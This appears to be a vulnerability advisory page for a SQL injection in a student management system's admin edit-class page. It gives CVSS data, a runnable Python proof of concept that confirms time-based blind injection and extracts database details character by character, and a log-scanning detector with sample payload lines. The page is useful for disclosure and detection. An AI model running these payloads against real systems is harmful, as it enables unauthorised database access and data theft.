Security Vulnerability Report
CVE-2025-66947 CVSS 6.5 MEDIUM

Published: 2025-12-26 15:15:48
Last Modified: 2025-12-31 14:54:39

Description

SQL injection vulnerability in krishanmuraiji SMS v.1.0, within the /studentms/admin/edit-class-detail.php via the editid GET parameter. An attacker can trigger controlled delays using SQL SLEEP() to infer database contents. Successful exploitation may lead to full database compromise, especially within an administrative module.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Weakness
CWE-89 (SQL Injection)

Both the Primary and the Secondary assessments in the record give the same vector: network-reachable, low attack complexity, no privileges, no user interaction, low confidentiality and integrity impact, no availability impact. Note the tension between PR:N and the affected script's location under /studentms/admin/: if the admin module enforces a login before edit-class-detail.php is reachable, an attacker first needs admin credentials and the practical exposure is narrower than the vector implies; if it does not, the unauthenticated-access assumption behind the score holds. Check the application's session handling on that path before accepting either reading.

Configurations (Affected Products)

cpe:2.3:a:krishanmurariji:student_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
krishanmuraiji SMS v1.0

The CPE vendor string (krishanmurariji) and the vendor name in the description (krishanmuraiji) are spelled differently; match on the product, student_management_system 1.0, when reconciling this record against an inventory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import string
import time

import requests

# CVE-2025-66947 SQL Injection PoC
# Target: krishanmuraiji SMS v1.0
# Vulnerability: SQL Injection in /studentms/admin/edit-class-detail.php (editid parameter)

target_url = "http://target.com/studentms/admin/edit-class-detail.php"

# Delay (seconds, single digit) the detection payloads ask the database to sleep for.
DELAY = 5


def timed_get(params, timeout):
    """Send one GET request with the given query parameters and return the elapsed seconds."""
    start_time = time.monotonic()
    requests.get(target_url, params=params, timeout=timeout)
    return time.monotonic() - start_time


def test_sql_injection():
    """Test for SQL injection in editid using the time-based blind technique."""
    # Normal request - baseline response time, so a slow server is not
    # mistaken for an injected delay.
    try:
        baseline_time = timed_get({"editid": "1"}, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Baseline request failed: {e}")
        return False
    print(f"[*] Baseline response time: {baseline_time:.2f} seconds")

    # Payloads that stall the query for DELAY seconds if editid is concatenated
    # into a quoted string in the SQL. The advisory describes SLEEP(), i.e. MySQL;
    # the SQL Server variant is kept as an alternative.
    injection_payloads = [
        f"1' AND (SELECT * FROM (SELECT SLEEP({DELAY}))a) AND '1'='1",  # MySQL
        f"1' OR SLEEP({DELAY})-- -",                                   # MySQL, comment-terminated
        f"1' WAITFOR DELAY '00:00:0{DELAY}'--",                        # SQL Server
    ]

    for payload in injection_payloads:
        print(f"\n[*] Testing payload: {payload}")
        try:
            elapsed_time = timed_get({"editid": payload}, timeout=30)
        except requests.exceptions.Timeout:
            # A hung or overloaded server also times out, so this alone proves nothing.
            print("[!] Request timed out - inconclusive, retry with a longer timeout")
            continue
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
            continue
        print(f"[+] Response time: {elapsed_time:.2f} seconds")
        # Confirmed only when the delay sits on top of the baseline response time.
        if elapsed_time >= baseline_time + DELAY:
            print("[!] VULNERABLE! Time-based SQL injection confirmed.")
            print(f"[!] The application delayed response by {elapsed_time - baseline_time:.2f} seconds.")
            return True
        print("[-] No significant delay detected.")
    return False


def extract_string(expression, max_length=32, sleep_seconds=3):
    """Recover the value of a SQL expression one character at a time.

    Each guess makes the database SLEEP() only when the guessed character
    matches, so the response time reveals one character per confirmed guess.
    Note that MySQL's default collations compare case-insensitively, so
    letters may come back in the wrong case.
    """
    charset = string.ascii_letters + string.digits + "._-@%"
    result = ""
    for position in range(1, max_length + 1):
        found = False
        for ch in charset:
            payload = (
                f"1' AND (SELECT * FROM (SELECT IF(SUBSTRING({expression},{position},1)='{ch}',"
                f"SLEEP({sleep_seconds}),0))a) AND '1'='1"
            )
            try:
                elapsed_time = timed_get({"editid": payload}, timeout=sleep_seconds * 3)
            except requests.exceptions.RequestException:
                continue
            if elapsed_time >= sleep_seconds:
                result += ch
                found = True
                print(f"[+] {expression}: {result}")
                break
        if not found:
            # No character matched: end of the value, or a character outside charset.
            break
    return result


def extract_data():
    """Extract database information using time-based blind SQL injection."""
    for label, expression in [
        ("database version", "@@version"),
        ("database user", "current_user()"),
        ("database name", "database()"),
    ]:
        print(f"\n[*] Extracting {label}...")
        value = extract_string(expression)
        print(f"[+] {label}: {value or '(not recovered)'}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-66947 SQL Injection PoC")
    print("Target: krishanmuraiji SMS v1.0")
    print("=" * 60)
    if test_sql_injection():
        print("\n[!] Vulnerability confirmed!")
        print("[*] Proceeding with data extraction...")
        extract_data()
    else:
        print("\n[-] Target may not be vulnerable or is not reachable.")
```
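The payloads above leave a recognisable trace in the web server's access log: the editid parameter, which the application expects to be a numeric id, arrives URL-encoded with SLEEP()/IF()/SUBSTRING() expressions in it. The following detector is an added example written for this page, not code from the advisory or from the SMS project. It assumes Apache combined log format and the path given in the advisory; the log lines are constructed for the demo and are not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Path named in the advisory; editid is the only parameter it should carry.
VULN_PATH = "/studentms/admin/edit-class-detail.php"

# Apache combined log format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Time-based SQL injection primitives across common engines.
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.IGNORECASE)

# Constructed sample log (not real traffic): a normal request, three requests
# matching the PoC payloads for this CVE, an unrelated admin page, and a
# malformed but non-injection id.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Dec/2025:10:01:02 +0000] "GET /studentms/admin/edit-class-detail.php?editid=7 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.23 - - [27/Dec/2025:10:03:44 +0000] "GET /studentms/admin/edit-class-detail.php?editid=1%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%20SLEEP%285%29%29a%29%20AND%20%271%27%3D%271 HTTP/1.1" 200 4312 "-" "python-requests/2.31"
198.51.100.23 - - [27/Dec/2025:10:03:51 +0000] "GET /studentms/admin/edit-class-detail.php?editid=1%27%20OR%20SLEEP%285%29--%20- HTTP/1.1" 200 4312 "-" "python-requests/2.31"
198.51.100.23 - - [27/Dec/2025:10:04:10 +0000] "GET /studentms/admin/edit-class-detail.php?editid=1%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%20IF%28SUBSTRING%28database%28%29%2C1%2C1%29%3D%27s%27%2CSLEEP%283%29%2C0%29%29a%29%20AND%20%271%27%3D%271 HTTP/1.1" 200 4312 "-" "python-requests/2.31"
10.0.0.9 - - [27/Dec/2025:10:05:00 +0000] "GET /studentms/admin/manage-classes.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Dec/2025:10:06:12 +0000] "GET /studentms/admin/edit-class-detail.php?editid=12abc HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""


def classify_editid(value):
    """Return a verdict for one decoded editid value, or None if it looks legitimate."""
    if value.isdigit():
        return None
    if TIME_BASED_RE.search(value):
        return "time-based SQLi"
    # Not an attack signature we know, but the parameter should be purely numeric.
    return "non-numeric editid"


def scan_log(text):
    """Scan access-log text and return one finding dict per suspicious editid."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != VULN_PATH:
            continue
        # parse_qs decodes one layer of percent-encoding; decode once more so a
        # double-encoded payload (e.g. %2527) is still inspected in clear text.
        for raw in parse_qs(url.query, keep_blank_values=True).get("editid", []):
            decoded = unquote_plus(raw)
            verdict = classify_editid(decoded)
            if verdict:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "editid": decoded,
                    "verdict": verdict,
                })
    return findings


def time_based_hits_by_ip(findings):
    """Count time-based hits per client, the figure an alert threshold would use."""
    counts = {}
    for f in findings:
        if f["verdict"] == "time-based SQLi":
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']} [{f['verdict']}] editid={f['editid']!r}")
    print("time-based hits per IP:", time_based_hits_by_ip(SAMPLE_LOG and results))
```

A 200 status on every injected request is expected here: time-based blind injection does not change the page, only its latency, so status-code alerting misses it entirely and the query string is the signal. Server-side, the fix for CWE-89 in this code path is to cast editid to an integer or bind it as a parameter in a prepared statement rather than concatenating it into the query.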

References

https://github.com/kabir0104k/CVE-2025-66947/blob/main/README.md (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66947",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-26T15:15:47.700",
    "lastModified": "2025-12-31T14:54:38.830",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SQL injection vulnerability in krishanmuraiji SMS v.1.0, within the /studentms/admin/edit-class-detail.php via the editid GET parameter. An attacker can trigger controlled delays using SQL SLEEP() to infer database contents. Successful exploitation may lead to full database compromise, especially within an administrative module."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:krishanmurariji:student_management_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FAFDB94F-C57E-4E92-B872-5FAF394CD05C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kabir0104k/CVE-2025-66947/blob/main/README.md",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Third Party Advisory"
        ]
      }
    ]
  }
}
```